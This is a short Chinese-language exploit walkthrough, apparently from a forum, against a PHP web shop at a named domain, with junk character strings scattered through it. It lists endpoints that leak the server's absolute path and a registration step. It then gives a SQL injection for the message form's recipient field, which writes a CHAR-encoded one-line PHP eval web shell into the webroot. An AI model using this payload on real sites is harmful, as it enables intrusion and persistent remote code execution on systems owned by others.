第一个:想办法找到目标网站的绝对路径
( S# O9 U+ H F2 |8 V Q# G- ?
http://www.political-security.com/install/svinfo.php?phpinfo=true- d0 v/ P0 ^" P7 f. J% q
% s! w1 ^: H) E5 m# G+ ]5 phttp:/www.political-security.com/core/api/shop_api.php
9 d& y, q+ {" r$ n$ J
( \( p4 e8 k6 q( H0 O7 v( Ohttp://www.political-security.co ... api_b2b_2_0_cat.php, x2 m9 }$ y" P6 E, E- h
* [# K, a& p9 a4 P$ G+ E3 P" ?
http://www.political-security.com/core/ap ... b_2_0_goodstype.php; q8 i) M2 g! X9 `, v; o3 h
( P) L" ^2 y! A5 f/ Shttp://www.political-security.co ... i_b2b_2_0_brand.php
1 ~/ I& U3 }3 ~/ J2 L% e第二个:注册一个普通用户
0 N4 r I3 I5 g T( p. C. K' W& j: C, n
http://www.political-security.com/?passport-signup.html
1 S' p: c# a+ N G0 q6 K" r" k- n E. U6 u1 `
第三个: 发送消息
& x9 T+ F: L+ n# E( z" A
; z" h: y% |8 _! Z- Mhttp://www.political-security.com/?member-send.html; F$ _0 G7 t; a
发送给中填写0 n5 {7 _5 o" G) S" D) I
antian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |